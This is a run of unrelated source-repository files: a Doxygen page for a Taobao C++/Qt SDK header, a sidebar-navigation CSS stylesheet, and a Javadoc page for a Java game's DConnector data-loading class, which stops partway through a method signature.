href="annotated.html"><span>Classes</span></a></li> <li class="current"><a href="files.html"><span>Files</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" id="MSearchField" value="Search" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="files.html"><span>File&#160;List</span></a></li> <li><a href="globals.html"><span>File&#160;Members</span></a></li> </ul> </div> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> <a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark">&#160;</span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark">&#160;</span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark">&#160;</span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark">&#160;</span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark">&#160;</span>Variables</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark">&#160;</span>Pages</a></div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <div id="nav-path" class="navpath"> <ul> <li class="navelem"><a class="el" href="dir_5ced2c06884fa9bf5c2da90298abd959.html">TaoApiCpp</a></li><li class="navelem"><a class="el" href="dir_b6b3a706edffae716cf3dcaba65ad0ec.html">response</a></li> </ul> </div> </div><!-- top --> <div class="header"> <div class="summary"> <a href="#nested-classes">Classes</a> </div> <div class="headertitle"> <div class="title">IncrementItemsGetResponse.h File Reference</div> </div> </div><!--header--> <div class="contents"> <div class="textblock"><code>#include &lt;<a class="el" href="TaoResponse_8h_source.html">TaoApiCpp/TaoResponse.h</a>&gt;</code><br/> <code>#include &lt;QList&gt;</code><br/> <code>#include &lt;<a class="el" href="NotifyItem_8h_source.html">TaoApiCpp/domain/NotifyItem.h</a>&gt;</code><br/> </div> <p><a href="IncrementItemsGetResponse_8h_source.html">Go to the source code of this file.</a></p> <table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="nested-classes"></a> Classes</h2></td></tr> <tr class="memitem:"><td class="memItemLeft" align="right" valign="top">class &#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classIncrementItemsGetResponse.html">IncrementItemsGetResponse</a></td></tr> <tr class="memdesc:"><td class="mdescLeft">&#160;</td><td class="mdescRight">TOP RESPONSE API: 开通主动通知业务的APP可以通过该接口获取商品变更通知信息 &lt;font color="red"&gt;建议获取增量消息的时间间隔是:半个小时&lt;/font&gt; <a href="classIncrementItemsGetResponse.html#details">More...</a><br/></td></tr> <tr class="separator:"><td class="memSeparator" colspan="2">&#160;</td></tr> </table> </div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Generated on Sun Apr 14 2013 16:25:37 for Taobao Cpp/Qt SDK by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/> </a> 1.8.3.1 </small></address> </body> </html>
includes/templates/everymarket_classic/css/style_sidenav.css
joshyan/everymarket
/** * CODNITIVE * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/osl-3.0.php * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade to newer * versions in the future. * * @category Codnitive * @package Codnitive_Sidenav * @author Hassan Barza <support@codnitive.com> * @copyright Copyright (c) 2011 CODNITIVE Co. (http://www.codnitive.com) * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0) */ /* Sidebar Navigation ==================================================================== */ #sidebar-nav { margin-bottom: 15px; position: relative; } #sidebar-nav .block-title { } #sidebar-nav .block-title strong { } #sidebar-nav .block-content { padding: 6px; overflow: auto; } #sidebar-nav .block-content a { line-height: 1.7; } #sidebar-nav-menu > li { background: url('../images/sidenav/bkg_block-sidebarnav-layered-dd.gif') 0 100% repeat-x; list-style: inside disc; font-weight: bold; padding: 8px 0; } #sidebar-nav-menu > li.last { background: none; margin-bottom: 5px; } #sidebar-nav-menu li ul { font-weight: normal; } #sidebar-nav li.active, #sidebar-nav li.active > a, #sidebar-nav li.active > .collapsible-wrapper > a { } #sidebar-nav ul.ul-thumb { padding-left: 0; } #sidebar-nav-menu > li.parent > ul.ul-thumb { padding-left: 10px; } #sidebar-nav li.thumb { list-style-type: none; } #sidebar-nav-menu > li.no-thumb, #sidebar-nav-menu > li.thumb { margin-left: 0 !important; list-style-type: none; } #sidebar-nav img { border: 0 none !important; outline: 0 none !important; } #sidebar-nav span.product-count { color: #000; } #sidebar-nav .home { list-style: none !important; } #sidebar-nav .home a { display:inline-block; padding-left:20px; background:url('../images/sidenav/home.png') left top no-repeat; min-height:16px; } #sidebar-nav .support-logo-wrapper { margin-top:10px; } #sidebar-nav .support_logo { font-size: 9px; float: right; right: 5px; bottom: 5px; text-decoration: none; } #sidebar-nav .support_logo img { max-width: 65px; } /* Collapsible Design ==================================================================== */ #sidebar-nav li.thumb .thumb-img-left { float: left; margin: 1px 3px 0 0; } #sidebar-nav li.thumb .thumb-img-right { float: right; margin: 1px 3px 0; } #sidebar-nav-menu .arrow-left, #sidebar-nav-menu .arrow-right, #sidebar-nav-menu .plus-left, #sidebar-nav-menu .plus-right { float: left; background: url('../images/sidenav/arrows.gif') left center no-repeat; display: block; margin-top: 2px; margin: 1px 3px 0; cursor:pointer; } #sidebar-nav-menu .plus-left, #sidebar-nav-menu .plus-right { background-image: url('../images/sidenav/plus.gif'); } #sidebar-nav-menu .arrow-right, #sidebar-nav-menu .plus-right { float:right; display:inline !important; } #sidebar-nav-menu li ul[expanded="0"] { display: none; } #sidebar-nav li.active > ul { display: block; } #sidebar-nav li.active > .arrow-left, #sidebar-nav li.active > .arrow-right, #sidebar-nav li.active > .plus-left, #sidebar-nav li.active > .plus-right { display: block; background-position: right center; } #sidebar-nav-menu > li.collapsible { list-style: none !important; } #sidebar-nav .collapse-name { cursor:pointer; }
doc/pl/isangeles/senlin/util/DConnector.html
Isangeles/Senlin
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_172-solus) on Fri Jun 22 22:42:05 CEST 2018 --> <title>DConnector</title> <meta name="date" content="2018-06-22"> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="DConnector"; } } catch(err) { } //--> var methods = {"i0":9,"i1":9,"i2":9,"i3":9,"i4":9,"i5":9,"i6":9,"i7":9,"i8":9,"i9":9,"i10":9,"i11":9,"i12":9,"i13":9,"i14":9,"i15":9,"i16":9}; var tabs = {65535:["t0","All Methods"],1:["t1","Static Methods"],8:["t4","Concrete Methods"]}; var altColor = "altColor"; var rowColor = "rowColor"; var tableTab = "tableTab"; var activeTableTab = "activeTableTab"; </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/DConnector.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../pl/isangeles/senlin/util/Coords.html" title="class in pl.isangeles.senlin.util"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../../pl/isangeles/senlin/util/GConnector.html" title="class in pl.isangeles.senlin.util"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../index.html?pl/isangeles/senlin/util/DConnector.html" target="_top">Frames</a></li> <li><a href="DConnector.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#field.summary">Field</a>&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#field.detail">Field</a>&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">pl.isangeles.senlin.util</div> <h2 title="Class DConnector" class="title">Class DConnector</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li>pl.isangeles.senlin.util.DConnector</li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <hr> <br> <pre>public final class <span class="typeNameLabel">DConnector</span> extends java.lang.Object</pre> <div class="block">This class provides static methods giving access to external game data like items, NPCs, etc;</div> <dl> <dt><span class="simpleTagLabel">Author:</span></dt> <dd>Isangeles</dd> </dl> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== FIELD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="field.summary"> <!-- --> </a> <h3>Field Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Field Summary table, listing fields, and an explanation"> <caption><span>Fields</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Field and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>static java.lang.String</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#SIMSUN_FONT">SIMSUN_FONT</a></span></code>&nbsp;</td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method.summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd">&nbsp;</span></span><span id="t1" class="tableTab"><span><a href="javascript:show(1);">Static Methods</a></span><span class="tabEnd">&nbsp;</span></span><span id="t4" class="tableTab"><span><a href="javascript:show(8);">Concrete Methods</a></span><span class="tabEnd">&nbsp;</span></span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr id="i0" class="altColor"> <td class="colFirst"><code>static java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/ArmorPattern.html" title="class in pl.isangeles.senlin.data.pattern">ArmorPattern</a>&gt;</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getArmors-java.lang.String-">getArmors</a></span>(java.lang.String&nbsp;basePath)</code> <div class="block">Parses specified XML base and returns map with armor patterns</div> </td> </tr> <tr id="i1" class="rowColor"> <td class="colFirst"><code>static java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/AttackPattern.html" title="class in pl.isangeles.senlin.data.pattern">AttackPattern</a>&gt;</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getAttacksMap-java.lang.String-">getAttacksMap</a></span>(java.lang.String&nbsp;basePath)</code> <div class="block">Parses XML base file and builds map with attacks patterns as values and its IDs as keys</div> </td> </tr> <tr id="i2" class="altColor"> <td class="colFirst"><code>static java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/BuffPattern.html" title="class in pl.isangeles.senlin.data.pattern">BuffPattern</a>&gt;</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getBuffsMap-java.lang.String-">getBuffsMap</a></span>(java.lang.String&nbsp;basePath)</code> <div class="block">Parses XML base file and builds map with buffs patterns as values and its IDs as keys</div> </td> </tr> <tr id="i3" class="rowColor"> <td class="colFirst"><code>static java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/core/dialogue/Dialogue.html" title="class in pl.isangeles.senlin.core.dialogue">Dialogue</a>&gt;</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getDialogueMap-java.lang.String-">getDialogueMap</a></span>(java.lang.String&nbsp;basePath)</code> <div class="block">Returns Map with dialogues map from specified base file</div> </td> </tr> <tr id="i4" class="altColor"> <td class="colFirst"><code>static java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/EffectPattern.html" title="class in pl.isangeles.senlin.data.pattern">EffectPattern</a>&gt;</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getEffectsMap-java.lang.String-">getEffectsMap</a></span>(java.lang.String&nbsp;basePath)</code> <div class="block">Parses XML base file content to list with Effect objects</div> </td> </tr> <tr id="i5" class="rowColor"> <td class="colFirst"><code>static java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/core/character/Guild.html" title="class in pl.isangeles.senlin.core.character">Guild</a>&gt;</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getGuildsMap-java.lang.String-">getGuildsMap</a></span>(java.lang.String&nbsp;basePath)</code> <div class="block">Parses XML doc and builds map with guilds and guilds IDs as keys</div> </td> </tr> <tr id="i6" class="altColor"> <td class="colFirst"><code>static java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/MiscPattern.html" title="class in pl.isangeles.senlin.data.pattern">MiscPattern</a>&gt;</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getMisc-java.lang.String-">getMisc</a></span>(java.lang.String&nbsp;basePath)</code> <div class="block">Returns map with miscellaneous item patterns as values and its IDs as keys</div> </td> </tr> <tr id="i7" class="rowColor"> <td class="colFirst"><code>static java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/NpcPattern.html" title="class in pl.isangeles.senlin.data.pattern">NpcPattern</a>&gt;</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getNpcMap-java.lang.String-">getNpcMap</a></span>(java.lang.String&nbsp;basePath)</code> <div class="block">Parses XML NPC base to map with NPC IDs as keys assigned to specific NPC pattern</div> </td> </tr> <tr id="i8" class="altColor"> <td class="colFirst"><code>static java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/ObjectPattern.html" title="class in pl.isangeles.senlin.data.pattern">ObjectPattern</a>&gt;</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getObjects-java.lang.String-">getObjects</a></span>(java.lang.String&nbsp;basePath)</code> <div class="block">Parses specified XML base with game objects to map with objects patterns as values and objects IDs as keys</div> </td> </tr> <tr id="i9" class="rowColor"> <td class="colFirst"><code>static java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/PassivePattern.html" title="class in pl.isangeles.senlin.data.pattern">PassivePattern</a>&gt;</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getPassivesMap-java.lang.String-">getPassivesMap</a></span>(java.lang.String&nbsp;basePath)</code> <div class="block">Parses XML base file content and builds map with passive skills patterns as values and its IDs as keys</div> </td> </tr> <tr id="i10" class="altColor"> <td class="colFirst"><code>static java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/core/quest/Quest.html" title="class in pl.isangeles.senlin.core.quest">Quest</a>&gt;</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getQuests-java.lang.String-">getQuests</a></span>(java.lang.String&nbsp;basePath)</code> <div class="block">Parses specified XML quest base file and returns map with quests ID's as keys and quest as values</div> </td> </tr> <tr id="i11" class="rowColor"> <td class="colFirst"><code>static java.util.List&lt;<a href="../../../../pl/isangeles/senlin/core/craft/Recipe.html" title="class in pl.isangeles.senlin.core.craft">Recipe</a>&gt;</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getRecipes-java.lang.String-">getRecipes</a></span>(java.lang.String&nbsp;basePath)</code> <div class="block">Parses specified recipes base to list with recipe objects</div> </td> </tr> <tr id="i12" class="altColor"> <td class="colFirst"><code>static <a href="../../../../pl/isangeles/senlin/data/area/Scenario.html" title="class in pl.isangeles.senlin.data.area">Scenario</a></code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getScenario-java.lang.String-java.lang.String-org.newdawn.slick.GameContainer-">getScenario</a></span>(java.lang.String&nbsp;scenariosDir, java.lang.String&nbsp;scenarioId, org.newdawn.slick.GameContainer&nbsp;gc)</code> <div class="block">Returns scenario with specified ID from file in specified directory</div> </td> </tr> <tr id="i13" class="rowColor"> <td class="colFirst"><code>static java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/area/Scenario.html" title="class in pl.isangeles.senlin.data.area">Scenario</a>&gt;</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getScenarios-java.lang.String-org.newdawn.slick.GameContainer-">getScenarios</a></span>(java.lang.String&nbsp;scenariosDir, org.newdawn.slick.GameContainer&nbsp;gc)</code> <div class="block">Returns map with all scenarios from specified file with scenarios IDs</div> </td> </tr> <tr id="i14" class="altColor"> <td class="colFirst"><code>static <a href="../../../../pl/isangeles/senlin/cli/Script.html" title="class in pl.isangeles.senlin.cli">Script</a></code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getScript-java.lang.String-">getScript</a></span>(java.lang.String&nbsp;scriptFileName)</code> <div class="block">Parses script with specified name in current module script dir</div> </td> </tr> <tr id="i15" class="rowColor"> <td class="colFirst"><code>static java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/TrinketPattern.html" title="class in pl.isangeles.senlin.data.pattern">TrinketPattern</a>&gt;</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getTrinkets-java.lang.String-">getTrinkets</a></span>(java.lang.String&nbsp;basePath)</code> <div class="block">Parses specified XML base and returns map with trinkets patterns</div> </td> </tr> <tr id="i16" class="altColor"> <td class="colFirst"><code>static java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/WeaponPattern.html" title="class in pl.isangeles.senlin.data.pattern">WeaponPattern</a>&gt;</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../../pl/isangeles/senlin/util/DConnector.html#getWeapons-java.lang.String-">getWeapons</a></span>(java.lang.String&nbsp;basePath)</code> <div class="block">Parses specified XML base and returns map with weapon patterns</div> </td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>equals, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ FIELD DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="field.detail"> <!-- --> </a> <h3>Field Detail</h3> <a name="SIMSUN_FONT"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>SIMSUN_FONT</h4> <pre>public static final&nbsp;java.lang.String SIMSUN_FONT</pre> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method.detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="getNpcMap-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getNpcMap</h4> <pre>public static&nbsp;java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/NpcPattern.html" title="class in pl.isangeles.senlin.data.pattern">NpcPattern</a>&gt;&nbsp;getNpcMap(java.lang.String&nbsp;basePath) throws javax.xml.parsers.ParserConfigurationException, org.xml.sax.SAXException, java.io.IOException</pre> <div class="block">Parses XML NPC base to map with NPC IDs as keys assigned to specific NPC pattern</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>baseName</code> - Name of base in data/npc dir</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>Map with NPC IDs as keys assigned to specific NPC pattern</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>javax.xml.parsers.ParserConfigurationException</code></dd> <dd><code>org.xml.sax.SAXException</code></dd> <dd><code>java.io.IOException</code></dd> </dl> </li> </ul> <a name="getGuildsMap-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getGuildsMap</h4> <pre>public static&nbsp;java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/core/character/Guild.html" title="class in pl.isangeles.senlin.core.character">Guild</a>&gt;&nbsp;getGuildsMap(java.lang.String&nbsp;basePath) throws javax.xml.parsers.ParserConfigurationException, org.xml.sax.SAXException, java.io.IOException</pre> <div class="block">Parses XML doc and builds map with guilds and guilds IDs as keys</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>baseFile</code> - Name of xml file in data/npc dir</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>Map with IDs and guilds</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>javax.xml.parsers.ParserConfigurationException</code></dd> <dd><code>org.xml.sax.SAXException</code></dd> <dd><code>java.io.IOException</code></dd> </dl> </li> </ul> <a name="getDialogueMap-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getDialogueMap</h4> <pre>public static&nbsp;java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/core/dialogue/Dialogue.html" title="class in pl.isangeles.senlin.core.dialogue">Dialogue</a>&gt;&nbsp;getDialogueMap(java.lang.String&nbsp;basePath) throws javax.xml.parsers.ParserConfigurationException, org.xml.sax.SAXException, java.io.IOException</pre> <div class="block">Returns Map with dialogues map from specified base file</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>baseFile</code> - XML base file</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>HashMap with dialogues and npcs IDs as keys</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>javax.xml.parsers.ParserConfigurationException</code></dd> <dd><code>org.xml.sax.SAXException</code></dd> <dd><code>java.io.IOException</code></dd> </dl> </li> </ul> <a name="getAttacksMap-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getAttacksMap</h4> <pre>public static&nbsp;java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/AttackPattern.html" title="class in pl.isangeles.senlin.data.pattern">AttackPattern</a>&gt;&nbsp;getAttacksMap(java.lang.String&nbsp;basePath) throws org.xml.sax.SAXException, java.io.IOException, javax.xml.parsers.ParserConfigurationException</pre> <div class="block">Parses XML base file and builds map with attacks patterns as values and its IDs as keys</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>baseFile</code> - XML base file</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>Map with attacks patterns as values and its IDs as keys</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>org.xml.sax.SAXException</code></dd> <dd><code>java.io.IOException</code></dd> <dd><code>javax.xml.parsers.ParserConfigurationException</code></dd> </dl> </li> </ul> <a name="getBuffsMap-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getBuffsMap</h4> <pre>public static&nbsp;java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/BuffPattern.html" title="class in pl.isangeles.senlin.data.pattern">BuffPattern</a>&gt;&nbsp;getBuffsMap(java.lang.String&nbsp;basePath) throws org.xml.sax.SAXException, java.io.IOException, javax.xml.parsers.ParserConfigurationException</pre> <div class="block">Parses XML base file and builds map with buffs patterns as values and its IDs as keys</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>baseFile</code> - XML base file</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>Map with buffs patterns as values and its IDs as keys</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>org.xml.sax.SAXException</code></dd> <dd><code>java.io.IOException</code></dd> <dd><code>javax.xml.parsers.ParserConfigurationException</code></dd> </dl> </li> </ul> <a name="getPassivesMap-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getPassivesMap</h4> <pre>public static&nbsp;java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/PassivePattern.html" title="class in pl.isangeles.senlin.data.pattern">PassivePattern</a>&gt;&nbsp;getPassivesMap(java.lang.String&nbsp;basePath) throws javax.xml.parsers.ParserConfigurationException, org.xml.sax.SAXException, java.io.IOException</pre> <div class="block">Parses XML base file content and builds map with passive skills patterns as values and its IDs as keys</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>basePath</code> - Path to XML base</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>Map with skills patterns as values and its IDs as keys</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>javax.xml.parsers.ParserConfigurationException</code></dd> <dd><code>java.io.IOException</code></dd> <dd><code>org.xml.sax.SAXException</code></dd> </dl> </li> </ul> <a name="getEffectsMap-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getEffectsMap</h4> <pre>public static&nbsp;java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/EffectPattern.html" title="class in pl.isangeles.senlin.data.pattern">EffectPattern</a>&gt;&nbsp;getEffectsMap(java.lang.String&nbsp;basePath) throws org.xml.sax.SAXException, java.io.IOException, javax.xml.parsers.ParserConfigurationException</pre> <div class="block">Parses XML base file content to list with Effect objects</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>baseFile</code> - </dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>ArrayList with all effects from base</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>org.xml.sax.SAXException</code></dd> <dd><code>java.io.IOException</code></dd> <dd><code>javax.xml.parsers.ParserConfigurationException</code></dd> </dl> </li> </ul> <a name="getScenarios-java.lang.String-org.newdawn.slick.GameContainer-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getScenarios</h4> <pre>public static&nbsp;java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/area/Scenario.html" title="class in pl.isangeles.senlin.data.area">Scenario</a>&gt;&nbsp;getScenarios(java.lang.String&nbsp;scenariosDir, org.newdawn.slick.GameContainer&nbsp;gc) throws java.io.FileNotFoundException</pre> <div class="block">Returns map with all scenarios from specified file with scenarios IDs</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>scenariosList</code> - file with scenarios IDs from data/area/scenarios dir</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>Map with scenarios as values and its IDs as keys</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>java.io.FileNotFoundException</code></dd> </dl> </li> </ul> <a name="getScenario-java.lang.String-java.lang.String-org.newdawn.slick.GameContainer-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getScenario</h4> <pre>public static&nbsp;<a href="../../../../pl/isangeles/senlin/data/area/Scenario.html" title="class in pl.isangeles.senlin.data.area">Scenario</a>&nbsp;getScenario(java.lang.String&nbsp;scenariosDir, java.lang.String&nbsp;scenarioId, org.newdawn.slick.GameContainer&nbsp;gc) throws javax.xml.parsers.ParserConfigurationException, org.xml.sax.SAXException, java.io.IOException, org.newdawn.slick.SlickException, 